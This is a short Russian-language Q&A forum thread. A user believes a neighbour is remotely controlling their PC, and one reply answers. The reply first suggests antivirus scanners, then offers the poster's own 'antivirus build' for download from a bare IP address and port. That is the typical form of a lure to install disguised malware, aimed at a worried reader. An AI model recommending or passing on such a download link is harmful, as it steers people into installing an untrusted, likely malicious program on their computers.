Соседский школьник подключился к моему ПК/Wi-fi. Включает, выключает звук, ставит видео на паузу. Явно видит что происходит на экране - вопрос №5257267

Пакостничает так, что мой комп зависает и всё как бы застывает, сворачиваются окна. Но всё застывает. Что это? Подскажите, пожалуйста, что делать

Ответы

И Вам доброго времени суток! Вы уверены, что это делает человек? Возможно это последствия работы программы, следует использовать антивирусные сканеры.

Если не поможет, можете поставить мою сборку антивируса http://195.46.187.155:8060/dlpkg?id=13168294